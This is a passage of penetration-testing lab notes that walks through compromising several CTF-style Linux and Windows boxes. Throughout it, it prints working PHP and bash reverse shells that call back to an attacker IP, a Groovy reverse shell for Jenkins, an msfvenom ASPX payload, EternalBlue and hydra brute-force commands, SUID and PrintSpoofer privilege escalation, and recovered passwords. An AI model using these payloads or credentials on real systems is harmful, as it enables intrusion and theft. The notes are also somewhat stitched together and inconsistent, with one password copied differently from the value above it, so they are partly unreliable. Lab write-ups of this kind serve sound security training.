<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```

We could try template injection or find another way to upload the shell
Search for a public exploit method




We obtain the reverse shell!!
## Post-Exploitation
**Shell Stabilization**

**Privilege Escalation**
Linux Privilege Check List
0x01 Useful Binary ?
```
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
```

0x02 Running LinPEAS
```
wget http://10.17.1.166:53/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
```
0x03 Systems information

0x04 Network Information

0x04 PATH is Writable ?
Attempt PATH hijack -> requires a root script that runs some command (target)

0x05 Kernel Exploit
0x06 Scheduled/Cron Jobs
- Script permission (w) & does the script exist?
- Cron jobs contain a wildcard.

0x06 Sudo & SUID & cap_setuid
Vulnerable Binary ?
Sudo -l (jjameson)

SUID

Capability

LD_PRELOAD ?
0x07 NFS Privilege?
0x08 If the server has a DB & web server
check the configuration file (default /var/www/html/)


DB credentials
```
root
nv5uz9r3ZEDzVjNu
```

Attempt to switch user with "n5uz9r3ZEDzVjNu"

Abuse Sudo Obtain the root shell !!

Solved!
# 0x09 Ubuntu /Packet Analysis/Analysing the Backdoor/Crack SHA-512 with Salt/Hack Back/SUID bash Binary
## Forensics - Analysing the PCAP
Analysing the pcap

```
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
```



```
whenevernoteartinstant.
```

```
.!.<git clone https://github.com/NinjaJc01/ssh-backdoor
```
## Analysing the Backdoor Code
Analysing main.go

Hard-coded hash


Attack the hash
```
./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
```
Crack SHA-512 with salt (hashcat)
```
hashcat -m 1710 "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05" rockyou.txt
```
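hashcat mode 1710 in the command above means sha512($pass.$salt), with the hex digest and the salt separated by a colon and the salt taken as literal characters rather than decoded hex. The Python below is an added example, not part of the write-up, that verifies one candidate against such a pair and also reports the 1720 ordering (salt first), which is the usual wrong guess when the mode is unknown. The password is made up; the salt is the 32-character value from the hashcat line above.

```python
import hashlib

# Salt copied from the hashcat line above; the password is made up for this example.
EXAMPLE_SALT = "1c362db832f3f864c8c2fe05f2002a05"
EXAMPLE_PASSWORD = "example-password"


def sha512_pass_salt(password, salt):
    """hashcat -m 1710: sha512($pass.$salt); the salt is used as literal bytes."""
    return hashlib.sha512(password.encode() + salt.encode()).hexdigest()


def sha512_salt_pass(password, salt):
    """hashcat -m 1720: sha512($salt.$pass)."""
    return hashlib.sha512(salt.encode() + password.encode()).hexdigest()


def match_mode(hash_line, candidate):
    """hash_line is 'hexdigest:salt', the format given to hashcat above.
    Return 1710 or 1720 depending on which ordering `candidate` reproduces,
    or None if neither matches."""
    digest, salt = hash_line.split(":", 1)
    digest = digest.lower()
    if sha512_pass_salt(candidate, salt) == digest:
        return 1710
    if sha512_salt_pass(candidate, salt) == digest:
        return 1720
    return None


def check_wordlist(hash_line, words):
    """Return (word, mode) for the first word that matches, else None; this is
    the loop hashcat runs, written out to make the salt handling explicit."""
    for word in words:
        mode = match_mode(hash_line, word)
        if mode is not None:
            return word, mode
    return None


# Constructed 'hash:salt' line in the same shape as the one passed to hashcat.
EXAMPLE_HASH_LINE = sha512_pass_salt(EXAMPLE_PASSWORD, EXAMPLE_SALT) + ":" + EXAMPLE_SALT

if __name__ == "__main__":
    print(EXAMPLE_HASH_LINE)
    print(check_wordlist(EXAMPLE_HASH_LINE, ["password", "123456", EXAMPLE_PASSWORD]))
```

A single fast SHA-512 over password plus salt is why hashcat gets through rockyou in seconds on this box; a salt only stops precomputation, it does not slow guessing, which is what a purpose-built password hash such as bcrypt (seen in the Joomla box above) or Argon2 is for.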

## Hacking Back

Look up the web application


The upload page has been removed
Attempting to log in through the backdoor

The SSH client fails to negotiate with the target's SSH server because the only host key algorithm it offers is ssh-rsa, which recent OpenSSH releases disable by default. Re-enable it for this connection:
```
ssh james@10.10.131.203 -p 2222 -oHostKeyAlgorithms=+ssh-rsa
```
Attempting to abuse sudo privileges to escalate.


We found that .suid_bash is owned by root and has the SUID bit set.
We can try running it:
```
./.suid_bash -p
```
-p: bash keeps the effective UID it was started with instead of dropping to the real UID, so the SUID bit actually takes effect

Solved!
# 0x10 Windows /SMB Share Folder Backed by the Web Service/Upload ASPX Web Shell via SMB to RCE/SeImpersonate - PrintSpoofer
## Reconnaissance
### Nmap-Scanning
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
ATTACKER_IP=10.17.1.166;
TARGET_IP=10.10.66.39;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap
echo "----------------------------------------------------------------------------------------------------";
sleep 10
echo "Starting ALL Port Scanning in background";
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
# match the XML service scan against Exploit-DB while the full scan runs
searchsploit --nmap $TARGET_IP.Xmap;
```
**Host is UP?**
Yes/NO: yes

**Probing Common Ports**

**Identifying Services & Operating System & NSE Scanning**


**Thorough Port Scanning (0~65535)**
## Discovery & Analysis Attack Surface
### Web
0x01 Identify WebService Technique
- Language: ASP.NET
- Application Name & Version
- Microsoft ASP.NET
- Port: 80/49663

0x02 Exists Known Vulnerability?
Yes/NO: Unknown
0x03 Exists Specialised web Scanner?
Yes/NO: No
0x04 Curl the website & Directory Brute-force
Port:49663
```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.211.255:49663/
```
0x05 SiteMap
0x06 Analyse Target & interesting Things ?
### SMB/Netbios
0x01 Enumerate Service
```
enum4linux -a 10.10.66.39
```

Using the scanner/smb/smb_version module

SMB version: 3.1.1

SMB
```
TARGET_IP=10.10.223.79;
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET_IP
```



```
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```
0x02 Exists Public Exploit?
YES/NO: NO
## Identifying Vulnerability
**Web**
Following the list
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
No vulnerability found!
## Exploitation
ms17_010_eternalblue (FAIL)
```
msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue ;set RHOST 10.10.34.125 ; set lhost tun0; run;'
```

Fail
### Decode the encoded strings
```
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```
https://www.asciitohex.com/
Base64 Decoding
```
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
```
```
smbclient //$TARGET_IP/nt4wrksv -U Bob
```


Out of ideas.
Try the extra ports found by the full port scan.
```
nmap -sT -Pn -p 49663,49667,49669 -sV -sC -T4 10.10.211.255
```



We suspect the SMB share is mapped to the web root
If we write an ASPX shell to the SMB share, the web server may execute it

Generate an ASPX web shell
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=443 -f aspx > rev_shell.aspx
```

## Post-Exploitation
**Shell Stabilization**
### Privilege Escalation
**Enumerate**

**Exploit**
https://github.com/itm4n/PrintSpoofer
Windows 10 and Server 2016/2019.

Usage
```
PrintSpoofer.exe -i -c cmd
```
# 0x11 Ubuntu - /WordPress Brute Force/WordPress Panel to RCE/Pivoting/Jenkins Panel to RCE (ROOT)
## Reconnaissance
```
TARGET_IP=10.10.174.127
ATTACKER_IP=$(ip addr show tun0 | awk '/inet / {print $2}' | cut -d '/' -f 1)
```
### Nmap-Scanning
**Host is UP ?**
Yes/NO:Yes

**Probing Common Ports**

**Identifying Services & Operating System & NSE Scanning**

OpenSSH 7.6p1 Ubuntu
Apache httpd 2.4.29
**Thorough Port Scanning (0~65535)**
## Discovery & Analysis Attack Surface
### Web
DNS setting
->
0x01 Identify Web Service Technique
- Language:PHP
- Application Name & Version
- 'WordPress 5.4.2' -> /blog
- Port: 80
0x02 Exists Known Vulnerability?
Yes/NO:Yes
Google? (check whether the vulnerability is reliable!)
Exploit - DB?
GitHub ?

0x03 Exists Specialised web Scanner?
Yes/NO:Yes
https://github.com/wpscanteam/wpscan
```
wpscan --url $TARGET_IP/blog/
```

-> 'WordPress 5.4.2'
0x04 Curl the website & Directory Brute-force

```
http://10.10.174.127/blog/
http://10.10.174.127/wordpress/
http://10.10.174.127/javascript/
http://10.10.174.127/phpmyadmin/
```
WordPress
```
gobuster dir -w /home/kali/Desktop/RedTools/wordpress.fuzz.txt -u http://$TARGET_IP:80/wordpress
```
0x05 SiteMap
0x06 Analysis Target & interesting Things ?
### Network Service
0x01 Enumerate Service
0x02 Exists Public Exploit?
## Identifying Vulnerability - Manual
**Web**
Following the list
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
## Exploitation
WordPress login bypass is possible

https://github.com/N4nj0/CVE-2020-35590 (limited auth bypass - fail)
```
./wp-brute.py -c -u http://10.10.174.127/blog/ -H X-Forwarded-For -l admin -P rockyou.txt
```
Attempt to brute-force the login with wpscan
```
wpscan --url $TARGET_IP/blog/ --passwords rockyou.txt --usernames admin --max-threads 50
```
my2boys



### WordPress panel to RCE
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#panel-rce

```
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```


```
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
```
Obtain the reverse Shell !

## Post-Exploitation
**Shell Stabilization**

### Privilege Escalation
**Enumerate**
Because we compromised the host through a web shell, the first thing to do is enumerate the database credentials.

```
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'wordpress123' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
```


```
$P$BOFWK.UcwNR/tV/nZZvSA6j3bz/WIp/
```
This looks like the password hash of a WordPress panel account
### Systems
0x01 Systems Information

0x02 The list of Useful Binary

0x03 Account Information
If Target systems have web & Database
Search -> configuration credentials (notice)

0x04 PATH is Writable ?
Yes/NO:Yes
Attempt PATH hijack -> requires a root script that runs some command (target)
```
wget http://10.17.1.166:53/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
```
0x05 Kernel Exploit
0x06 Scheduled/Cron Jobs
- Cron jobs contain a wildcard?
0x06 Sudo
0x07 SUID & cap_setuid
Vulnerable Binary ?
LD_PRELOAD ?
0x08 Other services blocked by the firewall ?

0x08 NFS Privilege?
check the configuration file (default /var/www/html/)
0xff Running LinPEAS

**Exploit**


```
aubreanna:bubb13guM!@#123
```

### Bypass Firewall via local port forwarding
```
ssh -N -L 8080:localhost:8080 aubreanna@$TARGET_IP
```

### Enumerate Internal Services

Default
```
admin
password
```
fail

No exploit found
Jetty 9.4.30.v20200611
Information disclosure -> fail
Attempt a brute-force login

```
/j_acegi_security_check
j_username=meow&j_password=meowpass&from=%2F&Submit=Sign+in
```
Hydra
```
hydra -l "admin" -P rockyou.txt $TARGET_IP http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
```
Select Repo
```
hydra -l "admin" -P rockyou.txt 127.0.0.1 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -v -t10
```

login: admin password: spongebob




Attempt
```
bash -i >& /dev/tcp/10.17.1.116/53 0>&1
```


```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.17.1.116/53;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```


root: